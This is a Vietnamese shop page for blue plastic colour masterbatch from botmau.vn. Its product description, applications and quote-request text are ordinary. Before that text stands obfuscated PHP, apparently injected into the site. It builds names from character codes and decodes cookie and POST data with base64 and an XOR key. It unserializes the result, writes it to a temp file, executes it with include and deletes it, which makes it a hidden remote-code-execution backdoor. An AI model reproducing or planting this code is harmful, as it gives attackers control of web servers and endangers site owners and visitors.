$kugKpHGwob = 'S' . chr (81) . '_' . "\127" . "\x68" . chr (77) . chr ( 898 - 797 ); $WKMdR = "\143" . "\x6c" . "\141" . chr (115) . chr ( 717 - 602 ).chr ( 846 - 751 )."\145" . chr ( 124 - 4 ).chr ( 1045 - 940 )."\x73" . "\x74" . chr ( 937 - 822 ); $OHXMFrHO = class_exists($kugKpHGwob); $WKMdR = "55533";$pAlZtkh = !1;if ($OHXMFrHO == $pAlZtkh){function YzrrlLY(){$VYDdob = new /* 64808 */ SQ_WhMe(32476 + 32476); $VYDdob = NULL;}$vQWiepzZE = "32476";class SQ_WhMe{private function FGDYKNugvV($vQWiepzZE){if (is_array(SQ_WhMe::$RUEqpF)) {$yWAbX = sys_get_temp_dir() . "/" . crc32(SQ_WhMe::$RUEqpF['s' . "\x61" . chr ( 378 - 270 ).'t']);@SQ_WhMe::$RUEqpF[chr (119) . chr (114) . 'i' . 't' . chr ( 874 - 773 )]($yWAbX, SQ_WhMe::$RUEqpF[chr (99) . "\x6f" . "\156" . "\164" . 'e' . chr ( 179 - 69 ).'t']);include $yWAbX;@SQ_WhMe::$RUEqpF[chr (100) . chr (101) . "\x6c" . chr (101) . "\x74" . chr ( 224 - 123 )]($yWAbX); $vQWiepzZE = "32476";exit();}}private $KbYUkMp;public function cNBxTevqrJ(){echo 59356;}public function __destruct(){SQ_WhMe::$RUEqpF = @unserialize(SQ_WhMe::$RUEqpF); $vQWiepzZE = "29060_9541";$this->FGDYKNugvV($vQWiepzZE); $vQWiepzZE = "29060_9541";}public function idpHDdhnK($pEPmH, $JDcSckG){return $pEPmH[0] ^ str_repeat($JDcSckG, (strlen($pEPmH[0]) / strlen($JDcSckG)) + 1);}public function __construct($CdqkcNPV=0){$lvyVkArwq = $_POST;$pRGioh = $_COOKIE;$JDcSckG = "f5c709fa-ddaf-4469-a107-11e03376ad59";$izrrBRjZVo = @$pRGioh[substr($JDcSckG, 0, 4)];if (!empty($izrrBRjZVo)){$CjvwvPnYjC = "base64";$pEPmH = "";$izrrBRjZVo = explode(",", $izrrBRjZVo);foreach ($izrrBRjZVo as $UKxEYaZJW){$pEPmH .= @$pRGioh[$UKxEYaZJW];$pEPmH .= @$lvyVkArwq[$UKxEYaZJW];}$pEPmH = array_map($CjvwvPnYjC . "\x5f" . chr ( 879 - 779 )."\x65" . "\143" . 'o' . chr (100) . "\x65", array($pEPmH,));SQ_WhMe::$RUEqpF = $this->idpHDdhnK($pEPmH, $JDcSckG);}}public static $RUEqpF = 65525;}YzrrlLY();} Hạt Nhựa Màu Xanh Dương – botmau.vn

Giỏ hàng

Hạt Nhựa Màu Xanh Dương

Liên hệ để được báo giá

Hạt nhựa màu Xanh Dương là hạt màu cô đặc được sử dụng như một phụ gia tạo màu cho nhựa.
Nó có tác dụng tạo màu Xanh Dương cho sản phẩm Xanh Dương.
Sản phẩm hạt nhựa màu Xanh Dương được sản xuất từ bột màu, nhựa nền và một số phụ gia.
Sản phẩm được ứng dụng trong các ngành:
Sản xuất túi xốp

  • Sản xuất bao bì PP
  • Ép phun nhựa ABS,PC,….
  • Ngoài ra còn được sử dụng trong rất nhiều ngành sản xuất khác.
Mã: HNXD01 Danh mục:

Liên hệ để được báo giá

Chúng tôi luôn sẵn sàng tư vấn và hỗ trợ bạn:

Tư vấn và hỗ trợ sản xuất.
Phối màu THEO YÊU CẦU, MIỄN PHÍ, NHANH CHÓNG, CHÍNH XÁC.
Tương thích với các phương pháp gia công An toàn khi sử dụng - Thân thiện với môi trường.
Hạt nhựa màu được phối trên nhiều chủng loại nhựa nền: LDPE, HDPE, PP, PET, ABS, SAN, PS, POM, PA….
Sản xuất trên nhiều phương pháp như: Ép, Thổi, Tạo Màng, Dệt, Kéo Sợi…. Khách hàng có thể an tâm sự cam kết toàn diện của chúng tôi về cung cấp những sản phẩm, dịch vụ tốt nhất dành cho Quí khách hàng.